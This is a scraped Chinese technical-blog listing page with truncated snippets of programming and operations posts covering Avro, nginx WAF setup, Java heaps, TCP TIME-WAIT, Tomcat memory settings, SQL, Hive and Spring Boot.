    本文的目的主要是总结下基于Avro Schema代码生成,然后进行序列化和反序列化开发的基本流程。需要指出的是,Avro并不要求一定得根据Schema文件生成代码,这对于动态类型语言很有用。   1. 添加Maven依赖   <?xml version="1.0" encoding="UTF-8"?> <proj
  • 安装nginx+ngx_lua支持WAF防护功能 ronin47
    需要的软件:LuaJIT-2.0.0.tar.gz                   nginx-1.4.4.tar.gz          &nb
  • java-5.查找最小的K个元素-使用最大堆 bylijinnan java
    import java.util.Arrays; import java.util.Random; public class MinKElement { /** * 5.最小的K个元素 * I would like to use MaxHeap. * using QuickSort is also OK */ public static void
  • TCP的TIME-WAIT bylijinnan socket
    原文连接: http://vincent.bernat.im/en/blog/2014-tcp-time-wait-state-linux.html 以下为对原文的阅读笔记 说明: 主动关闭的一方称为local end,被动关闭的一方称为remote end 本地IP、本地端口、远端IP、远端端口这一“四元组”称为quadruplet,也称为socket 1、TIME_WA
  • jquery ajax 序列化表单 coder_xpf Jquery ajax 序列化
       checkbox 如果不设定值,默认选中值为on;设定值之后,选中则为设定的值   <input type="checkbox" name="favor" id="favor" checked="checked"/> $("#favor&quo
  • Apache集群乱码和最高并发控制 cuisuqiang apachetomcat并发集群乱码
    都知道如果使用Http访问,那么在Connector中增加URIEncoding即可,其实使用AJP时也一样,增加useBodyEncodingForURI和URIEncoding即可。 最大连接数也是一样的,增加maxThreads属性即可,如下,配置如下: <Connector maxThreads="300" port="8019" prot
  • websocket dalan_123 websocket
    一、低延迟的客户端-服务器 和 服务器-客户端的连接 很多时候所谓的http的请求、响应的模式,都是客户端加载一个网页,直到用户在进行下一次点击的时候,什么都不会发生。并且所有的http的通信都是客户端控制的,这时候就需要用户的互动或定期轮训的,以便从服务器端加载新的数据。   通常采用的技术比如推送和comet(使用http长连接、无需安装浏览器安装插件的两种方式:基于ajax的长
  • 菜鸟分析网络执法官 dcj3sjt126com 网络
      最近在论坛上看到很多贴子在讨论网络执法官的问题。菜鸟我正好知道这回事情.人道"人之患好为人师" 手里忍不住,就写点东西吧. 我也很忙.又没有MM,又没有MONEY....晕倒有点跑题. OK,闲话少说,切如正题. 要了解网络执法官的原理. 就要先了解局域网的通信的原理. 前面我们看到了.在以太网上传输的都是具有以太网头的数据包. 
  • Android相对布局属性全集 dcj3sjt126com android
    RelativeLayout布局android:layout_marginTop="25dip" //顶部距离android:gravity="left" //空间布局位置android:layout_marginLeft="15dip //距离左边距 // 相对于给定ID控件android:layout_above 将该控件的底部置于给定ID的
  • Tomcat内存设置详解 eksliang jvmtomcattomcat内存设置
    Java内存溢出详解   一、常见的Java内存溢出有以下三种:   1. java.lang.OutOfMemoryError: Java heap space ----JVM Heap(堆)溢出JVM在启动的时候会自动设置JVM Heap的值,其初始空间(即-Xms)是物理内存的1/64,最大空间(-Xmx)不可超过物理内存。 可以利用JVM提
  • Java6 JVM参数选项 greatwqs javaHotSpotjvmjvm参数JVM Options
    Java 6 JVM参数选项大全(中文版)   作者:Ken Wu Email: [email protected] 转载本文档请注明原文链接 http://kenwublog.com/docs/java6-jvm-options-chinese-edition.htm!   本文是基于最新的SUN官方文档Java SE 6 Hotspot VM Opt
  • weblogic创建JMC i5land weblogicjms
    进入 weblogic控制太 1.创建持久化存储 --Services--Persistant Stores--new--Create FileStores--name随便起--target默认--Directory写入在本机建立的文件夹的路径--ok 2.创建JMS服务器 --Services--Messaging--JMS Servers--new--name随便起--Pers
  • 基于 DHT 网络的磁力链接和BT种子的搜索引擎架构 justjavac DHT
    上周开发了一个磁力链接和 BT 种子的搜索引擎 {Magnet & Torrent},本文简单介绍一下主要的系统功能和用到的技术。 系统包括几个独立的部分: 使用 Python 的 Scrapy 框架开发的网络爬虫,用来爬取磁力链接和种子; 使用 PHP CI 框架开发的简易网站; 搜索引擎目前直接使用的 MySQL,将来可以考虑使
  • sql添加、删除表中的列 macroli sql
    添加没有默认值:alter table Test add BazaarType char(1) 有默认值的添加列:alter table Test add BazaarType char(1) default(0) 删除没有默认值的列:alter table Test drop COLUMN BazaarType 删除有默认值的列:先删除约束(默认值)alter table Test DRO
  • PHP中二维数组的排序方法 abc123456789cba 排序二维数组PHP
    <?php/*** @package     BugFree* @version     $Id: FunctionsMain.inc.php,v 1.32 2005/09/24 11:38:37 wwccss Exp $*** Sort an two-dimension array by some level
  • hive优化之------控制hive任务中的map数和reduce数 superlxw1234 hivehive优化
    一、    控制hive任务中的map数: 1.    通常情况下,作业会通过input的目录产生一个或者多个map任务。 主要的决定因素有: input的文件总个数,input的文件大小,集群设置的文件块大小(目前为128M, 可在hive中通过set dfs.block.size;命令查看到,该参数不能自定义修改);2. 
  • Spring Boot 1.2.4 发布 wiselyman spring boot
    Spring Boot 1.2.4已于6.4日发布,repo.spring.io and Maven Central可以下载(推荐使用maven或者gradle构建下载)。   这是一个维护版本,包含了一些修复small number of fixes,建议所有的用户升级。   Spring Boot 1.3的第一个里程碑版本将在几天后发布,包含许多
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他